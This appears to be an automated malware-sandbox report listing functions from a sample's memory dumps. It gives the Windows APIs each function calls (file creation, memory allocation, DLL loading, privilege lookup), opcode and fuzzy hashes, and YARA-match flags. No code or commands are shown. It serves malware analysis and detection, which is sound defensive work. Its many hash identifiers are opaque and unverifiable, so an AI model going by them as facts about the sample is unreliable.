Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AB, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1de8b77ca88b6b55c30221094c92626fed24076e734ddd0600625f50e7437d7b
Instruction ID: 1f098e659592923698cbf308ce08847877bcc6cb260763e10339c90a201a15b6
Opcode Fuzzy Hash: 1de8b77ca88b6b55c30221094c92626fed24076e734ddd0600625f50e7437d7b
Instruction Fuzzy Hash: 3D01C4B2200108AFCB48CF98DC94EEB37A9AF8C754F15824CFA1D97241C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DD, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: cc186a868d0ccdd1849d0baf69c85b5790aaefe839e205b60058e67c0a27e21f
Instruction ID: c22294dbd830283e3f5f79fa29ddc7d2fb4e59098a2dcf14da5bc39e30075e5a
Opcode Fuzzy Hash: cc186a868d0ccdd1849d0baf69c85b5790aaefe839e205b60058e67c0a27e21f
Instruction Fuzzy Hash: B7D012752003107BD710DF94DC85ED77759EF45351F154559BA1C6B341C530E51487D0

Uniqueness

Uniqueness Score: -1.00%

Function 01179910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117991A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9567428c76f980710385a28e7992767564c8846e2668f73b1203c6783feefcf
Instruction ID: e90c77b9c103287f882cdb5b78e2a965335224bf8e6c315fadb08cdf0899dc1f
Opcode Fuzzy Hash: f9567428c76f980710385a28e7992767564c8846e2668f73b1203c6783feefcf
Instruction Fuzzy Hash: C89002B120110402D54471999504B461005A7D0341F51C015E5055558EC7998DD57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 011799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011799AA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8bb23f0b8e67f12783a67377549611b10241ebe04c5d756c9facdbe43418434
Instruction ID: bc080e64fb4c7ba03cf51d9cc589a51693f3a919a421a087da2b117f5a85b62f
Opcode Fuzzy Hash: a8bb23f0b8e67f12783a67377549611b10241ebe04c5d756c9facdbe43418434
Instruction Fuzzy Hash: E39002A134110442D50471999514F061005E7E1341F51C019E1055558DC759CC527566

Uniqueness

Uniqueness Score: -1.00%

Function 01179840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117984A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a01556a3fd5d11aac44f98395f49dd4faf0ce2ab4b2c413155b225d210bf716
Instruction ID: 2aa1b54c9c32c9e29dedf0a61b607fe1237ed14a2e4ea6759b909ca89ecb1fee
Opcode Fuzzy Hash: 9a01556a3fd5d11aac44f98395f49dd4faf0ce2ab4b2c413155b225d210bf716
Instruction Fuzzy Hash: D4900261242141525949B19995049075006B7E0281791C016E1405954CC7669856EA61

Uniqueness

Uniqueness Score: -1.00%

Function 01179860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117986A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5054c5253babb411ed9b459c5b682ee7042c03ec09f543363153cf8a8190815
Instruction ID: c55367f059a1e3245922d403668cd424e3245ab0b6ddea57f4ebc3c9234aa920
Opcode Fuzzy Hash: c5054c5253babb411ed9b459c5b682ee7042c03ec09f543363153cf8a8190815
Instruction Fuzzy Hash: 9E90027120110413D51571999604B071009A7D0281F91C416E041555CDD7968952B561

Uniqueness

Uniqueness Score: -1.00%

Function 011798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011798FA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f1c7b6150ed358dae52d703e735968c1a22503d07508fef46c30eb41739fe87
Instruction ID: c738d0a7be918fa57bbccf0f0f469650150ac5952a41cdc8a580b72430501d78
Opcode Fuzzy Hash: 9f1c7b6150ed358dae52d703e735968c1a22503d07508fef46c30eb41739fe87
Instruction Fuzzy Hash: 2E90026160110502D50571999504A16100AA7D0281F91C026E1015559ECB658992B571

Uniqueness

Uniqueness Score: -1.00%

Function 01179A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01179A0A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6875c2f6992514524ebbd5b76fed8a49278e590443a4eef88cde51647c6f5065
Instruction ID: ce87b857755d940e03041c277b88528be8c28bff5be05414264f5ef617fe2aa1
Opcode Fuzzy Hash: 6875c2f6992514524ebbd5b76fed8a49278e590443a4eef88cde51647c6f5065
Instruction Fuzzy Hash: D490027120150402D50471999914B0B1005A7D0342F51C015E1155559DC765885179B1

Uniqueness

Uniqueness Score: -1.00%

Function 01179A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01179A2A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 371d3932587d1b74adfdaa8c26e13455c118c0de1a6f53260e3d50b51297d54b
Instruction ID: 68479d8dd61c8a004eb293e54c7c2a6d2c6091ece00efb771aabd8f94962143b
Opcode Fuzzy Hash: 371d3932587d1b74adfdaa8c26e13455c118c0de1a6f53260e3d50b51297d54b
Instruction Fuzzy Hash: F690026160110042454471A9D944D065005BBE1251751C125E0989554DC79988656AA5

Uniqueness

Uniqueness Score: -1.00%

Function 01179A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01179A5A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74cec68f744abe2b1f8e626c95773950e6ec1adaf72ef2b72a0361db60de7c8e
Instruction ID: 30469ae11576d68d57adc6aa3d7552d2c55a94d7f148ee2f3303336ead4e33be
Opcode Fuzzy Hash: 74cec68f744abe2b1f8e626c95773950e6ec1adaf72ef2b72a0361db60de7c8e
Instruction Fuzzy Hash: DC90026121190042D60475A99D14F071005A7D0343F51C119E0145558CCB5588616961

Uniqueness

Uniqueness Score: -1.00%

Function 01179540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117954A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b598d8b5d1384449f85492f1d2a16b99069a56af22e93c7b2f1b0dd67942cae1
Instruction ID: 394ae0de53b28546b50ad9c7a86b5a66478f6550e11455ec0190404d8659856d
Opcode Fuzzy Hash: b598d8b5d1384449f85492f1d2a16b99069a56af22e93c7b2f1b0dd67942cae1
Instruction Fuzzy Hash: 72900265211100030509B59957049071046A7D5391351C025F1006554CD76188616561

Uniqueness

Uniqueness Score: -1.00%

Function 011795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011795DA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a018fa92d36895fcfb201ad22b9afb5bd24d4283b4ebbcb44bd6ee720c7d08bb
Instruction ID: fd5bb296675fb1cf87fffc5f7689187e949c0f089b7cc5903f9aa02626987a9f
Opcode Fuzzy Hash: a018fa92d36895fcfb201ad22b9afb5bd24d4283b4ebbcb44bd6ee720c7d08bb
Instruction Fuzzy Hash: 899002A120210003450971999514A16500AA7E0241B51C025E1005594DC76588917565

Uniqueness

Uniqueness Score: -1.00%

Function 01179710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117971A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a83d25633a0b7e795de4d785c4563909dd517d4bd03153a934609a465e6cdce
Instruction ID: b4b29a109d1fc67bae57afa80a51db77c187ba3515dda49fc3128d2154cc14bc
Opcode Fuzzy Hash: 3a83d25633a0b7e795de4d785c4563909dd517d4bd03153a934609a465e6cdce
Instruction Fuzzy Hash: D890027120110402D50475D9A508A461005A7E0341F51D015E5015559EC7A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 01179780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117978A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dc69537a9cacfc8a77fe947331fe2a45c0e58b5c74569f3e8cbe94f4b17a9d2
Instruction ID: ee53b78afd67a78b8fdbe620a56ceec25007499a927f789f9e3f731ed83f54ac
Opcode Fuzzy Hash: 2dc69537a9cacfc8a77fe947331fe2a45c0e58b5c74569f3e8cbe94f4b17a9d2
Instruction Fuzzy Hash: 0D90026921310002D5847199A508A0A1005A7D1242F91D419E000655CCCB5588696761

Uniqueness

Uniqueness Score: -1.00%

Function 011797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011797AA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8c567023b8c706d7dd360692576962e598d63a45cbd9415456574b0ac520a9f
Instruction ID: 224401d580a72f843a0911988add7613309e6e1e805c60f0f8dc512d6b83a0b5
Opcode Fuzzy Hash: d8c567023b8c706d7dd360692576962e598d63a45cbd9415456574b0ac520a9f
Instruction Fuzzy Hash: 1790026130110003D5447199A518A065005F7E1341F51D015E0405558CDB5588566662

Uniqueness

Uniqueness Score: -1.00%

Function 01179FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01179FEA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c6a863f08cbe4c5eb6c175936ae0046ad242912564a2001283617720243e017
Instruction ID: a6169bbb552eb1ff30b9d84ba488510562c9f0fcd0f64f838e129c9111b411c4
Opcode Fuzzy Hash: 8c6a863f08cbe4c5eb6c175936ae0046ad242912564a2001283617720243e017
Instruction Fuzzy Hash: 2A90027131124402D5147199D504B061005A7D1241F51C415E081555CDC7D588917562

Uniqueness

Uniqueness Score: -1.00%

Function 01179660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0117966A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 852fc9dd0140e2efb68f7f705db4053c5b1001309b9351f2581c6289416ab528
Instruction ID: cddbb00c473d69f4eada7648ece5a746a77dc83f98e9f1e4c04b126c40157f12
Opcode Fuzzy Hash: 852fc9dd0140e2efb68f7f705db4053c5b1001309b9351f2581c6289416ab528
Instruction Fuzzy Hash: 4F90027120110802D58471999504A4A1005A7D1341F91C019E0016658DCB558A597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 011796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011796EA

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b49f59a9e1e01d36b3aa9448ca686700479a00dc00bcb68fdf2c227c09786ad3
Instruction ID: 3ebc4a8fb32798121ec82282f48d86c3f7db629da026f3cd9b661fff544806f0
Opcode Fuzzy Hash: b49f59a9e1e01d36b3aa9448ca686700479a00dc00bcb68fdf2c227c09786ad3
Instruction Fuzzy Hash: 1B90027120118802D5147199D504B4A1005A7D0341F55C415E441565CDC7D588917561

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004185C5, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5d289e4ee5f07dcee374740c9d6e68c62febf7b96e505b63ab00261ebc980793
Instruction ID: 93de15ee5d6aac583a56b96ba60d207c2ac31b6ae4e16d8537fbbb7db7dce013
Opcode Fuzzy Hash: 5d289e4ee5f07dcee374740c9d6e68c62febf7b96e505b63ab00261ebc980793
Instruction Fuzzy Hash: 122125B2200208AFDB14DF99DC81EEB37ADAF8C314F058259FA0D97241CA34E811CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e13689baff5e288012e2b3569b8043642cb7a4917e1efa1f71facf7e41946c3d
Instruction ID: 0e48a6674682d3f81e865fc1e774d10b9f063829dfd4c6f47aab261ec9a7c293
Opcode Fuzzy Hash: e13689baff5e288012e2b3569b8043642cb7a4917e1efa1f71facf7e41946c3d
Instruction Fuzzy Hash: 43F06DB1600714AFCB10DF65DC85EE777A9EF89310F118169FA0C9B251CA30A851CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 34ab828b5c7b63bd7f1194aff2ff9fd45413a9bebd8307f715ad1256aabc3ac6
Instruction ID: 0d7b5ad37ae4c5580ca8630e9ad131f8523144f278ca8480ea2ab81ebf749605
Opcode Fuzzy Hash: 34ab828b5c7b63bd7f1194aff2ff9fd45413a9bebd8307f715ad1256aabc3ac6
Instruction Fuzzy Hash: AEE06DB1200605ABDB14EF55DC44EE737ADAF85350F458559F9286B382CA71E914CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bc1db28a52a107411f24d6f72bf213694855ecc23afb425fd36816259d7cce66
Instruction ID: 28df170d90322d41bf951ef3328cfdb19b0a85464ba2ca38850435474e66040a
Opcode Fuzzy Hash: bc1db28a52a107411f24d6f72bf213694855ecc23afb425fd36816259d7cce66
Instruction Fuzzy Hash: 81E04F316003006FC725DFA8CC85FD73BA8AF49350F0585A8B9086F352D530EA00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 0117967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01179694

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bf7eeab8a36b88ed00251fdd1ed7037ea3bbafaf33389521d4b3ce1eb0de315
Instruction ID: 3374555b170c720c2ada9f428d7c50ccb712734ae5f1297fbb4cbecd33c81636
Opcode Fuzzy Hash: 5bf7eeab8a36b88ed00251fdd1ed7037ea3bbafaf33389521d4b3ce1eb0de315
Instruction Fuzzy Hash: CFB02BB18010C4C5DA05E3A04708F17390077D0300F12C011E1020640B4338C080F5B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

read from, xrefs: 011EB4AD, 011EB4B2
This failed because of error %Ix., xrefs: 011EB446
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011EB53F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011EB314
*** Resource timeout (%p) in %ws:%s, xrefs: 011EB352
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011EB2DC
*** An Access Violation occurred in %ws:%s, xrefs: 011EB48F
The resource is owned shared by %d threads, xrefs: 011EB37E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011EB305
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 011EB39B
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011EB476
a NULL pointer, xrefs: 011EB4E0
The resource is owned exclusively by thread %p, xrefs: 011EB374
The instruction at %p referenced memory at %p., xrefs: 011EB432
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011EB38F
*** enter .exr %p for the exception record, xrefs: 011EB4F1
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011EB3D6
an invalid address, %p, xrefs: 011EB4CF
